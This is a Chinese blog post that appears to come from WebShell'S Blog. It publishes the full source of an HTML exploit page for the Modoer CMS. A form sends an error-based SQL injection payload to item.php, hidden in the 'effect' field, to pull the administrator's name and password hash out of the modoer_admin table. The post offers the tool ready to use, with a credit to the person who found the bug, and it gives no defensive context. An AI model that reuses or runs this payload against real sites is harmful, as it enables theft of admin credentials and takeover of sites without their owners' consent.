源码:

<html>
<head>
<title> Modoer EXP </title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<script language="javascript">
    function expstart() {
            var url = document.forms[0].url.value;
            if(url != ""){
                    if(url.search("http://") < 0 && url.search("https://") < 0){
                            url = "http://" + url;
                    }
                    document.submit_url.action = url + "/item.php?act=ajax&op=get_membereffect&do=subject";
        }else{
                alert("Hello Hacker!!!");
        }
    }
</script>
<body>
<h2>声明:本漏洞是t00ls -- <span style="color: #ff0000;"><h1>Rices</h1></span> 大牛挖的!本菜自己需要用就写了一个!!</h2>
<h2>Modoer EXP </h2>
<form action="" method="post" name="submit_url">
    <span style="color: #ff0000;">url: </span>
    <input type="text" name="url" value="http://" size="40">
    <input type="hidden" name="effect" value="(select 1 from(select count(*),concat((select (select (SELECT concat(adminname,0x7c,password) FROM modoer_admin limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #">
    <input type="hidden" name="sid" value="1">
    <input type="hidden" name="member" value="1">
    <input type="submit" value="exp" onclick="expstart();">
</form>
<body>
</html>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4040.html